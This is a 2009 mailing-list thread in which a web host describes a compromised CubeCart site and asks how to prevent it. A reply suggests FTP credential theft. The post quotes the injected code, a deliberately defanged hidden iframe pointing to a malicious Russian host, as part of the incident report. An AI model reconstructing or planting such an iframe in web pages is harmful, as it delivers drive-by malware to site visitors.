[thelist] Server hacked?

Shannon Hubbell brundlefly at gmail.com
Fri Jul 10 10:55:05 CDT 2009 

Are you using FTP?

http://www.eweek.com/c/a/Security/Trojan-Swipes-FTP-Credentials-for-Major-Companies-in-Malware-Attack-340752/

On Fri, Jul 10, 2009 at 2:42 AM, Sales @ Lycosa <sales at lycosa.co.uk> wrote:

> Hi, I just had a scary moment, and I thought my server had been
> compromised.
> It turns out that just one site had been compromised, with the injection of
> the following code into all the index pages within each directory of the
> site. (I have added spaces to prevent the link delivering its payload).
>
>
>
> i_f_r_a_m_e  s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 "
> width=125 height=125 style="visibility: hidden"
>
>
>
> The site runs cube cart, and I suspect a Trojan was somehow added to the
> review pages of the site. No passwords were altered, so I am assuming this
> is the work of a script. I take the security of my servers very seriously,
> and I take steps to maintain their integrity, but this is a new one for me.
> Also, according to my customer, his site has been listed as dangerous with
> Google.
>
>
>
> My question is this: how did a script infect my server without a
> username/password, and how do I prevent this happening again?
>
>
>
> [ I have researched Google, and sent a support ticket to my hosting
> company,
> but nothing yet ]
>
>
>
> Thanks.
>
>
>
> Phil Parker
>
>
>
>
>
> Kind regards,
>
> Phil Parker
>
>
> Lycosa Web Services Ltd,
> 47 Hilderthorpe Road,
> Bridlington,
> East Yorkshire.
> YO15 3AZ.
>
> Tel: 01262 42 42 99
> Email:  <mailto:sales at lycosa.co.uk> sales at lycosa.co.uk
> Web:  <http://www.lycosa.co.uk> http://www.lycosa.co.uk
>
> Registered in England and Wales company no. 04614248
> ------------------------------------------------------------------------
> WEB DESIGN - ECOMMERCE SOLUTIONS - WEB PROMOTION
> ------------------------------------------------------------------------
> Disclaimer: The information in this email is confidential and is intended
> solely for the use of the addressee. If you are not the intended recipient
> of this email you have received it in error and any disclosure, copying or
> distribution is strictly prohibited.
> Any quotation or estimate is valid for 30 days from the date of this email.
>
> E. & O. E.
>
>
>
> --
>
> * * Please support the community that supports you.  * *
> http://evolt.org/help_support_evolt/
>
> For unsubscribe and other options, including the Tip Harvester
> and archives of thelist go to: http://lists.evolt.org
> Workers of the Web, evolt !
>

More information about the thelist mailing list